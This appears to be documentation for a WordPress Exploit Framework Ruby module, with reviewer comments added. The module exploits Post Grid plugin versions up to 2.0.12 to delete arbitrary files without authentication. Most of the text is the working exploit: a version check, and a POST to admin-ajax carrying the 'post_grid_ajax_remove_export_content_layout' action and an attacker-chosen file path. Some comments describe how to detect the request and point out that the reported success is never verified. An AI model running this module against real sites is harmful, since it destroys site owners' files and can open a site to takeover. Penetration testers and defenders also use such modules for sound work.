class Wpxf::Auxiliary::PostGridFileDeletion

Public Class Methods

new()
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 6
# Sets up the module: registers its descriptive metadata and declares the one
# option it needs.
#
# The metadata describes an unauthenticated arbitrary file deletion issue in
# Post Grid releases up to and including 2.0.12. The references point at the
# public disclosure, which is the place to confirm affected and fixed versions.
def initialize
  super

  summary = 'This module exploits a vulnerability in versions <= 2.0.12 of ' \
            'the Post Grid plugin which allows you to delete any arbitrary ' \
            'file accessible by the user the web server is running as.'
  credits = [
    'White Fir Design', # Disclosure
    'rastating'         # WPXF module
  ]
  advisories = [
    ['WPVDB', '8667'],
    ['URL', 'https://www.pluginvulnerabilities.com/2016/11/08/file-deletion-vulnerability-in-post-grid/']
  ]

  update_info(
    name: 'Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Nov 08 2016'
  )

  # The only input is the path handed to the plugin; it is mandatory.
  path_option = StringOption.new(
    name: 'remote_file',
    desc: 'The relative or absolute path of the file to delete (relative to /wp-admin/)',
    required: true
  )
  register_options([path_option])
end

Public Instance Methods

check()
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 34
# Version check for the Post Grid plugin, delegated to
# check_plugin_version_from_readme and returning whatever that helper returns.
#
# NOTE(review): the module title lists <= 2.0.12 as affected, so '2.0.13' is
# presumably the first fixed release used as the cut-off; confirm against the
# helper's contract. Sites still on an affected release should upgrade.
def check
  plugin_slug = 'post-grid'
  version_bound = '2.0.13'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
remote_file()
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 38
# Returns the value of the 'remote_file' option as produced by
# normalized_option_value (the normalisation itself is defined elsewhere).
def remote_file
  option_name = 'remote_file'
  normalized_option_value(option_name)
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 42
# Sends a single POST to the admin-ajax URL with the
# 'post_grid_ajax_remove_export_content_layout' action and the configured path
# in file_url, then reports the outcome.
#
# Returns false when the superclass run fails, when there is no response or it
# timed out, or when the status code is not 200. Returns true otherwise.
#
# NOTE(review): success is declared on any HTTP 200. The response body is not
# inspected and no follow-up request is made, so 'File deleted' is an
# unverified result and should be reported as such.
#
# For detection: the request is a POST to admin-ajax carrying this action name
# and a file_url parameter, which per the module title needs no authentication.
def run
  return false unless super

  emit_info "Deleting #{remote_file}..."
  ajax_url = wordpress_url_admin_ajax
  form_fields = {
    action: 'post_grid_ajax_remove_export_content_layout',
    file_url: remote_file
  }
  res = execute_post_request(url: ajax_url, body: form_fields)

  failure =
    if res.nil? || res.timed_out?
      'Request timed out'
    elsif res.code != 200
      "Server responded with code #{res.code}"
    end

  if failure
    emit_error failure
    return false
  end

  emit_success 'File deleted'
  true
end